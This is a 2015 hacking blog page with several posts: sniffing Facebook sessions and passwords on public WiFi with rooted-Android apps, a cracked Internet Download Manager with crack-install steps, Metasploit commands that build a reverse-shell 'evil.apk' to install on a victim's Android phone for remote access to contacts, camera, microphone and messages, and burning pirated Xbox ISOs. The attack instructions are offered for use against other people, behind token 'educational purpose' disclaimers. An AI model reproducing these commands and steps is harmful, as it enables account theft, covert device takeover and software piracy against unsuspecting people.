Sunday 25 January 2015

Facebook Hacking Tools: Hack Facebook Accounts Using Android Phone

hack facebook using android phone

There could be many reasons for hacking someone's Facebook account and it is not so simple as we speak. One should know the fact that there are no direct softwares that can hack Facebook account simply by entering the victim's user id. But it is possible with some methods those really work, out of which phishing, key logging, packet sniffing are most popular and widely used ones. Today, in this tutorial you are going to learn how to perform packet sniffing attack to hack Facebook account using your Android smartphone.

What exactly is packet sniffing?

hack facebook using android

Lets make this simple with an example. Consider two persons A and B using the same public WiFi network. The information sent and received between the device and WiFi hot-spot is done in the form of packets. These packets are not secured and can be access by any other device connected to same network. If Person A is using Facebook, his log-in credentials are sent in the form of packets which Person B can access and read them. In fact, Person B can modify them. Not only log-in credentials, everything you use within your browser can be seen and modified by anyone else as long as you are connected to that network.

So, Why Android Phone?

Earlier, when this process is first developed the only way to do packet sniffing is using PC or laptop running on Windows or Linux operating system. But now it can be done using any Android phone with root access (we shall talk about this later). The main reason for using Android phone is simplicity. It works same as PC, in terms of speed and accuracy. It has same number of tools as PC. And when you are in crowd, you can simply take out your mobile and do some hacking anonymously.

Does the Android Phone require any particular specs?

No particular specifications are needed for your Android device to do this. But your device needs to be rooted. For a brief explanation of what rooting is, read the tutorial on "How to Root Any Android Device".

Now, what is the main process?

Let's end the intro here. Now lets talk about the main procedure of packet sniffing. This tutorial assumes that you have an Android device, of course rooted. Now all you have to do is, install one of the Applications listed below, connect to a public WiFi network and start hacking people. Usually there are many apps out there that can perform packet sniffing. I have used all such apps and found these three to be working perfect even during poor network signal.


1. DroidSheep [Requires Root]

DroidSheep is one of the best app to hack Facebook and other website accounts. DroidSheep cannot get username and password credentials but can grab live sessions of users and show them on your device. Live sessions means, according to our example, if Person B is using Facebook and Gmail in two tabs of his browser, Person A gets exactly the same tabs in his device further which he can modify or access any required content from them. Using DroidSheep you can hack almost any website accounts based on the victim's usage. As DroidSheep is being used for illegal purposes it's download link has been removed from official DroidSheep website. Search Google and you can find it.


2. Faceniff [Requires Root]

Faceniff is another tiny application that is used to hack Facebook accounts over WiFi now and then. Unlike DroidSheep, Faceniff is solely created to hack only Facebook accounts. Using Faceniff you can get user id and passwords of the people using Facebook in the same WiFi network.

3. Dsploit [Requires Root] - Works Best

According to me, Dsploit is the best, in terms of penetration testing attacks. Dsploit has a number of pen testing attacks like Router PWN, Port Scanner, Inspector, Vulnerability Finder, MITM attacks and many more. We are going to use MITM attacks for our purpose. MITM stands for Man In The Middle attacks which include Password Sniffer, Session Hijacker, Script Injector out of which we are going to use Password Sniffer to get account passwords over WiFi. If you are curious about this app, explore it and you will find lots of tools in it.


Download Working & Updated version of Dsploit here: DOWNLOAD LINK.

Disclaimer: Hacking Facebook is an illegal activity, use this tutorial for educational purpose only and we claim no responsibility.

Bottom Lines: Hacking Facebook account using Android phone is a bit easier process when compared to PC and hacking over WiFi is the only process to do it. If you know more apps of this kind, feel free to comment below. Happy Hacking!

Friday 23 January 2015

Internet Download Manager (IDM) Latest Version Full Including Crack With Key


Does your download interrupts due to poor internet connection? or are you getting poor download speeds even with good internet connection? Try the latest Internet Download Manager (IDM). This never beaten download manager can download files of any size, using the full bandwidth for download and gives you the maximum download speed. The cracked full version can boost your download speeds upto 5 times faster. So far, IDM is the best download manager that can resume interrupted downloads. IDM grabs the whole download page and refreshes the download link when updated, so downloads can be paused and continued at any time. In IDM there is no limit for number of parallel downloads.

Key Features:
  • Supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing.
  • Integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads.
  • Can be used from command line.
  • Can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.
  • Multilingual support.
  • Zip preview.
  • Download categories.
  • Scheduler pro.
  • Sounds on different events.
  • HTTPS support.
  • Queue processor.
  • Enhanced virus protection on download completion.
  • Built-in download accelerator.
Download Link:


Instructions For Installation:

1) Download Internet Download Manager(IDM) from the above download link.

2) If you have any previous version installed on your pc, uninstall it and restart the pc.

3) Now install the setup in the downloaded files.

4) Now close the Internet Download Manager and close it from the tray too.

5) Now open the crack folder and copy the contents of the crack to the default installation directory.

6) Now run Internet Download Manager and if the software prompts for serial key enter the serial key given in the downloaded files.

Hack To Remotely Control Any Android Device Using Kali Linux or Ubuntu


Hello everyone! Today we are back with an awesome tutorial on Hacking Android devices to Control them Remotely. There are,in fact, no user-friendly softwares out there that can simply hack any Android device on the go and retrieve the desired information. So, in order to achieve this we are going to take the coding way(though there is not much code), and we are going to use Linux operating system, Kali Linux and Ubuntu are recommended ones.


What actually are we doing:

In this tutorial, we are going to create a deploy application using Kali Linux Metasploit which should be installed on the target android device. When installed successfully, we can gain full access to that device.

What will you need:

1) A PC or Laptop running on Linux Operating System. If you are on windows or mac, you can do this on Oracle VM VirtualBox. Download it from here.

2) Active Internet Connection.

3) An Android device to test the hack. That's it!

What one can do with this hack: 

By the end of this tutorial, one can perform the below hacks after successfully installing the deploy application on target device.
  • Get contacts (and all theirs informations)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Get all messages
  • Streaming video (for activity based client only)
  • Access file manager and many more...

The Main Procedure:

When you are all set, carefully follow the below steps one by one.(all the code you need to enter will be shown in red color)

step1: Open the terminal in Linux , type the below code and press enter.

:~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk




If you don't know your ip address, simply open another terminal and type "ifconfig" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: you need to do this only when you are connected to Internet).

Step2: Now the deploy application evil.apk will be automatically generated. You can find it in home folder.

Step3: Now open another terminal and type the below code.

> msfconsole




It takes sometime for metasploit to download and load its contents. So be patient!

Step4: When metasploit successfully loaded type the below code.

> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 192.168.45.4 (the same ip address you entered in step1).
> set lport 8080 (the same port you used in step1).
> exploit





Now the console starts listening to 192.168.45.4 at port 8080.

Step5: Now all you need to do is, copy the evil.apk from home folder to the target device.

Step6: Install the evil.apk on the target device and when the device is connected to the internet open the app.

Step7: As soon as you open the app in the device, you can see the connected device in console terminal.




Step8: Now you have full access to the device from the terminal. Just type help and you will be given with all the available commands.




Congrats! you have successfully hacked an android device.

Also See:



Note: Accessing other's device without their permission is completely illegal. This tutorial is for educational purpose only and never use it for any illegal purpose.

How to avoid these kind of apps:

From this tutorial you may have understood how easy it is to hack android devices. So to protect your self from being hacked you should check the app thoroughly before installing it. It is must to check app permissions before installing because the app cannot do anything without user's permission.



Saturday 17 January 2015

How To Burn And Play Call of Duty(COD): Advanced Warfare iso Xbox 360

Call of Duty: Advanced Warfare is the latest edition of Call of Duty series, the most popular first person shooter games. As expected the original disc costs around 3.5 grand in India. For those who can afford it, everything goes fine. But the users who jtagged(exploited) their consoles may face some errors while trying to play from downloaded ISO. Usually we people, after downloading the ISO, burn it to some dual layered DVD. But when i tried this process the console pops up a message showing "Cannot Read Data From DVD". If you people have faced the same error or any other error try following the below steps.

First Process:

What will you need:

  • A 16 GB Pendrive formatted using Xbox. Follow this tutorial. (A better company like sony or hp would do the job).
  • Horizon. Download from here.
  • Xbox Backup Creator. Download from here.
  • A Dual Layered DVD or External Hard drive fat32 formatted.
1) First copy the both iso's to pc. Now extract first iso to a folder using Xbox Backup Creator.

2) Look-up for the folder called "CONTENT" in the extracted files. You will find 2 files inside the content folder.The two files look like this.

41560914051BF3C0
4156091407406280

3) Install Horizon and open it. Now connect your Xbox formatted Usb drive to pc. Drop the two files in the horizon and wait for the copying to complete.

4) Now you are done with iso 1 and lets move to the iso 2.

5) Burn the second iso to a dual layered DVD (or) extract the second iso and copy the extracted folder to the hard drive.

6) Now connect the Usb drive to Xbox and play the game using second Dvd.

Most Important Step: Enjoy the Game!


Second Process:

Things Required:
  • Two Dual layered Dvds.
  • A 16GB Xbox formatted Usb Drive(only for those who are low on HDD space).
1) First burn the two isos to two different dual layered Dvds.

2) Insert the first Dvd into your Xbox and install its components to internal HDD or Usb.

3) Now insert your second Dvd into Xbox and play the game.

First process is a bit easier when compared to second one.